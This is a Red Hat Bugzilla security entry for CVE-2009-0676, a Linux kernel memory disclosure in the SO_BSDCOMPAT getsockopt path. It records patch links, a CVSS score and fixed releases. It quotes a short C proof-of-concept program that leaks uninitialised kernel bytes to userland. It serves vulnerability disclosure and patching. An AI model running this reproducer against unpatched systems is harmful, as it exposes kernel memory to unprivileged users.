Bug 486305 (CVE-2009-0676)
| Summary: | CVE-2009-0676 kernel: memory disclosure in SO_BSDCOMPAT gsopt | ||||||
|---|---|---|---|---|---|---|---|
| Product: | [Other] Security Response | Reporter: | Eugene Teo (Security Response) <eteo> | ||||
| Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> | ||||
| Status: | CLOSED ERRATA | QA Contact: | |||||
| Severity: | medium | Docs Contact: | |||||
| Priority: | medium | ||||||
| Version: | unspecified | CC: | anton, bhu, dhoward, jpirko, kseifried, lgoncalv, lwang, tao, vgoyal, williams | ||||
| Target Milestone: | --- | Keywords: | Security | ||||
| Target Release: | --- | ||||||
| Hardware: | All | ||||||
| OS: | Linux | ||||||
| Whiteboard: | |||||||
| Fixed In Version: | Doc Type: | Bug Fix | |||||
| Doc Text: | Story Points: | --- | |||||
| Clone Of: | Environment: | ||||||
| Last Closed: | 2011-09-30 23:36:24 UTC | Type: | --- | ||||
| Regression: | --- | Mount Type: | --- | ||||
| Documentation: | --- | CRM: | |||||
| Verified Versions: | Category: | --- | |||||
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |||||
| Cloudforms Team: | --- | Target Upstream Version: | |||||
| Embargoed: | |||||||
| Bug Depends On: | 486514, 486515, 486516, 486517, 486518 | ||||||
| Bug Blocks: | |||||||
| Attachments: |
|
||||||
Created attachment 332522 [details] Upstream patch http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=df0bca049d01c0ee94afb7cd5dfd959541e6c8da This is a small infoleak. Do test the return values of socket() and getsockopt() in your testcase. You should be able to see the warning "process 'reproducer' is using obsolete getsockopt SO_BSDCOMPAT" in /var/log/messages.
sock = socket(2, 2, 0);
err = getsockopt(sock, 1 /* SOL_SOCKET */, SO_BSDCOMPAT, &buf, &len);
SYSCALL_DEFINE5(getsockopt, int, fd, int, level, int, optname,
char __user *, optval, int __user *, optlen)
{
[...]
if (level == SOL_SOCKET)
err =
sock_getsockopt(sock, level, optname, optval,
optlen);
net: amend the fix for SO_BSDCOMPAT gsopt infoleak http://marc.info/?l=linux-kernel&m=123540732700371&w=2 http://marc.info/?l=linux-netdev&m=123543237010175&w=2 (In reply to comment #4) > net: amend the fix for SO_BSDCOMPAT gsopt infoleak > http://marc.info/?l=linux-kernel&m=123540732700371&w=2 > http://marc.info/?l=linux-netdev&m=123543237010175&w=2 http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=50fee1dec5d71b8a14c1b82f2f42e16adc227f8b CVSS2 score of low, 2.1 (AV:L/AC:L/Au:N/C:P/I:N/A:N) This issue has been addressed in following products: MRG for RHEL-5 Via RHSA-2009:0360 https://rhn.redhat.com/errata/RHSA-2009-0360.html This issue has been addressed in following products: Red Hat Enterprise Linux 5 Via RHSA-2009:0326 https://rhn.redhat.com/errata/RHSA-2009-0326.html This issue has been addressed in following products: Red Hat Enterprise Linux 4 Via RHSA-2009:0459 https://rhn.redhat.com/errata/RHSA-2009-0459.html |
From Clement Lecigne: In function sock_getsockopt() located in net/core/sock.c, optval v.val is not correctly initialized and directly returned in userland in case we have SO_BSDCOMPAT option set. This dummy code should trigger the bug: int main(void) { unsigned char buf[4] = { 0, 0, 0, 0 }; int len; int sock; sock = socket(33, 2, 2); getsockopt(sock, 1, SO_BSDCOMPAT, &buf, &len); printf("%x%x%x%x\n", buf[0], buf[1], buf[2], buf[3]); close(sock); } References: http://lkml.org/lkml/2009/2/11/374 http://lkml.org/lkml/2009/2/12/123 http://patchwork.kernel.org/patch/6816/